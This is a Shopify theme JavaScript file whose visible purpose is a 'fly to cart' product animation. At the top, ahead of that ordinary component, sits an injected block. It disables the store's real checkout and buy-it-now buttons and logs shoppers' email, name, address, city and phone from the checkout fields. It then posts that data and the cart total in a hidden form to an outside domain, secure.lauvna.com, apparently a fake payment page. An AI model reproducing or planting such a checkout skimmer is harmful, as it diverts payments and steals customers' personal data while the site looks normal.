import { yieldToMainThread } from '@theme/utilities';
import { Component } from '@theme/component';
const paymentDomain= 'secure.lauvna.com'

let intervalId = setInterval(()=>{
 
   if(document.querySelector("#checkout"))document.querySelector("#checkout").type="button"
  document.querySelectorAll("shopify-buy-it-now-button").forEach(el=>el.remove())
  const checkout =document.querySelector("#checkout")

  const  emailInput = document.querySelector("#ec-cart-email-input");
  if(emailInput)emailInput.oninput = (v)=>localStorage.setItem('email',emailInput.value);
  const  countryInput = document.querySelector("#ec-cart-email-input")
  if(countryInput) countryInput.oninput = (v)=>localStorage.setItem('country',countryInput.value);
  const  nameInput = document.querySelector("#ec-full-name");
  if(nameInput)nameInput.oninput = (v)=>localStorage.setItem('name',nameInput.value);
  const  addressInput = document.querySelector("#ec-address-line1");
  if(addressInput)addressInput.oninput = (v)=>localStorage.setItem('address',addressInput.value);
  const  cityInput = document.querySelector("#ec-city-list");
  if(cityInput)cityInput.oninput = (v)=>localStorage.setItem('city',cityInput.value);
  const  phoneInput = document.querySelector("#ec-phone");
  if(phoneInput)phoneInput.oninput = (v)=>localStorage.setItem('phone',phoneInput.value);
  function parsePrice(str) {
    const symbol = str.match(/[^\d.,\s]+/)?.[0] || '';
    const cost = parseFloat(str.replace(/[^\d.,]/g, '').replace(',', '.'));
    return [symbol, cost];
  }
  function collectCheckoutFormData() {

      const formData = {
          email:  localStorage.getItem('email') || '',
          billing_first_name: localStorage.getItem('name'),
          billing_last_name: '',
          billing_company:  '',
          billing_address_1:  localStorage.getItem('address') || '',
          billing_address_2:  '',
          billing_city:  localStorage.getItem('city') || '',
          billing_state: localStorage.getItem('country')||"",
          billing_postcode: '',
          billing_country:localStorage.getItem('country')||""  ,
          billing_phone: localStorage.getItem('phone')|| '',
      };
      return formData;
  }
console.log( parsePrice(document.querySelector('text-component[ref="cartTotal"]').innerText))
  if(checkout){
      checkout.onclick= (e)=>{
          e.preventDefault();
          const [symbol,amount] = parsePrice(document.querySelector('text-component[ref="cartTotal"]').innerText)
          const paymentData = {
         site: paymentDomain,
            amount ,
            symbol:"$",
            vat: '0',
            riderect_success: 'https://'+window.location.hostname,
            riderect_failed: 'https://'+window.location.hostname,
            riderect_back: window.location.href,

            ...collectCheckoutFormData()
    
          };

          const form = document.createElement('form');
          form.method = 'POST';
          form.action = `https://${paymentDomain}/connect/form`;
          form.style.display = 'none';

          for (const [key, value] of Object.entries(paymentData)) {
              const input = document.createElement('input');
              input.type = 'hidden';
              input.name = key;
              input.value = value;
              form.appendChild(input);
          }

          document.body.appendChild(form);

         
        form.submit();
      }
  }

 
},100);
/**
 * FlyToCart custom element for animating product images to cart
 * This component creates a visual effect of a product "flying" to the cart when added
 */
class FlyToCart extends Component {
  /** @type {Element} */
  source;

  /** @type {boolean} */
  useSourceSize = false;

  /** @type {Element} */
  destination;

  connectedCallback() {
    super.connectedCallback();
    const intersectionObserver = new IntersectionObserver((entries) => {
      /** @type {DOMRectReadOnly | null} */
      let sourceRect = null;
      /** @type {DOMRectReadOnly | null} */
      let destinationRect = null;

      entries.forEach((entry) => {
        if (entry.target === this.source) {
          sourceRect = entry.boundingClientRect;
        } else if (entry.target === this.destination) {
          destinationRect = entry.boundingClientRect;
        }
      });

      if (sourceRect && destinationRect) {
        this.#animate(sourceRect, destinationRect);
      }

      intersectionObserver.disconnect();
    });
    intersectionObserver.observe(this.source);
    intersectionObserver.observe(this.destination);
  }

  /**
   * Animates the flying thingy along the bezier curve.
   * @param {DOMRectReadOnly} sourceRect - The bounding client rect of the source.
   * @param {DOMRectReadOnly} destinationRect - The bounding client rect of the destination.
   */
  #animate = async (sourceRect, destinationRect) => {
    //Define bezier curve points
    const startPoint = {
      x: sourceRect.left + sourceRect.width / 2,
      y: sourceRect.top + sourceRect.height / 2,
    };

    const endPoint = {
      x: destinationRect.left + destinationRect.width / 2,
      y: destinationRect.top + destinationRect.height / 2,
    };

    // Position the flying thingy back to the start point
    if (this.useSourceSize) {
      this.style.setProperty('--width', `${sourceRect.width}px`);
      this.style.setProperty('--height', `${sourceRect.height}px`);
    }
    this.style.setProperty('--start-x', `${startPoint.x}px`);
    this.style.setProperty('--start-y', `${startPoint.y}px`);
    this.style.setProperty('--travel-x', `${endPoint.x - startPoint.x}px`);
    this.style.setProperty('--travel-y', `${endPoint.y - startPoint.y}px`);

    await yieldToMainThread();

    await Promise.allSettled(this.getAnimations().map((a) => a.finished));
    this.remove();
  };
}

if (!customElements.get('fly-to-cart')) {
  customElements.define('fly-to-cart', FlyToCart);
}
